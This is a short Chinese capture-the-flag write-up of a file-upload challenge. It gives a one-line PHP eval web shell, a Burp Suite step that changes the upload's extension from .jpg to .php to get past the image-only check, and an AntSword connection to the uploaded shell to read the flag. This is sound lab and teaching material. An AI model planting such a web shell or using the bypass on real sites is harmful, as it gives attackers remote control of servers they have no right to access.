看了场景后,发现是需要上传一个文件,随意上传一个文件后,提示需要上传一个图片文件。
这种情况一般是一句话木马,因为写一句话木马的文件是php,所以上传后需要burpsuite修改包后缀名为jpg,最后用场景网站文件位置利用中国蚁剑连接。
首先构造我们的一句话木马:
<?php
@eval($_POST['attack']);
?>
将文件格式改成jpg,然后上传。
上传后,打开burpsuite。
将图中jpg改为php
最后forward。
接下来看见upload success : upload/1699281482.一句话木马.php后,打开中国蚁剑,添加数据。
如图所示。
最后双击web段,就可以在文档中找到flag。